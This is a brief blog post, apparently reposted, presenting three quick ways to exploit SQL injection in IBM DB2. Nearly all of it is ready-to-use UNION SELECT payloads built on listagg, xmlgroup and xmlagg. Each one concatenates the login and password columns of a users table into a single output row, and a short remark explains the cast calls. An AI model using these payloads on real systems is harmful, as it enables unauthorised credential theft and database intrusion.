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Fast exploitation method of SQL Injection in IBM DB2

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Fast exploitation method of SQL Injection in IBM DB2

1. listagg

select * from news where id=-1 union select null,listagg(login||chr(58)||pass,chr(44)) from users


(In the first example I use cast function only for good formatted output, but in the second and the third examples cast function is needed for the type conversion)

2. xmlgroup

select * from news where id=-1 union select null,cast(xml2clob(xmlgroup(login,pass)) as varchar(180)) from users


3. xmlagg

select * from news where id=-1 union select null,cast(xml2clob(xmlagg(xmlrow(login,pass))) as varchar(180)) from users


Posted by dsrbr at 10:02 AM

Sursa: http://dsrbr.blogspot.ru/

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